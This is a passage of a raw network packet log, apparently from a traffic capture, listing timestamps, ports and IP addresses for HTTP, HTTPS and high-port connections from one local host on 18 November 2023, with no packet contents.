Nov 18, 2023 10:02:35.327248096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327253103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327265024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327282906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327295065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327300072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327313900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327317953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327336073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327337027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327354908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327372074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327380896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327388048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327404976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327421904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327421904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327439070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327441931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327455997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327469110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327476978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327495098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327512026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327521086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327528954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327538967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327547073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327564001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327579975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327616930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327634096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327636003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327652931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327671051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327687979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327689886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327704906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327722073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327733040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327742100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327752113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327759027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327775002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327775002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327791929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327807903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327821016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327826023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327843904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327862978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327863932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327879906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327883005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327899933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327917099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327918053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327933073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327950954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327959061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327966928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.327980995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.327984095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328001022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328017950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328027010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328035116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328054905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328066111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328072071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328083038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328088999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328108072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328125954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328130960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328141928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328161001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328167915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328178883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328187943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328197002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328213930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328224897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328231096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328248978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328265905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328265905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328283072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328284025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328300953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328318119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328327894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328335047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328351974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328370094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328372955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328387022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328401089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328403950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328419924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328422070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328438997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328454971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328460932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328473091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328490973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328496933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328509092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328525066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328526974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328541040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328543901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328557968 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328562975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328579903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328591108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328598022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328614950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328629017 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328634977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328651905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328666925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328668118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328682899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328686953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328702927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328720093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328726053 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328737020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328753948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328761101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328771114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328783035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328788042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328805923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328809977 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328823090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328841925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328850031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328860044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328876019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328887939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328893900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328907013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328911066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328928947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328933954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328948975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328965902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.328970909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.328984976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329001904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329015970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329019070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329035044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329035997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329097986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329099894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329118013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329133034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329140902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329158068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329170942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329175949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329190016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329193115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329210997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329231024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329233885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329251051 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329256058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329273939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329292059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329294920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329309940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329329014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329329967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329345942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329354048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329364061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329381943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329396009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329399109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329417944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329430103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329435110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329448938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329452038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329469919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329487085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329493999 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329503059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329519987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329524994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329538107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329555035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329562902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329574108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329577923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329591990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329613924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329616070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329632998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329649925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329651117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329668045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329673052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329685926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329704046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329710960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329720974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329741001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329751015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329758883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329776049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329777956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329792023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329807997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329822063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329824924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329840899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329854012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329859972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329876900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329876900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329895020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329900026 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329911947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329929113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329942942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.329947948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329965115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329982996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.329983950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330001116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330010891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330018997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330034971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330037117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330054045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330070972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330082893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330087900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330105066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330121994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330137968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330138922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330157042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330174923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330183983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330192089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330209017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330209970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330226898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.330249071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330286980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.330302954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.331324100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.443481922 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:35.445307016 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:35.571046114 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571137905 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571187973 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571234941 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571238041 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.571257114 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571288109 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.571312904 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571351051 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571360111 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.571363926 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571408987 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.571880102 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571950912 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.571985960 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.572035074 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.572041035 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.572087049 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.631443024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631474018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631491899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631510019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631548882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631584883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631618023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631638050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631655931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631675005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631686926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631694078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631711960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631717920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631730080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631762028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631763935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631783009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631795883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631800890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631827116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631829023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631846905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631863117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631865025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631880999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631897926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631897926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631916046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631932974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631937027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631949902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631956100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631968021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.631979942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.631984949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632002115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632015944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632018089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632035017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632049084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632052898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632069111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632103920 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632143021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632160902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632179022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632189035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632196903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632215023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632224083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632231951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632244110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632251024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632266998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632270098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632286072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632288933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632302999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632327080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632344007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632361889 CET	80	49744	194.49.94.120	192.168.2.4
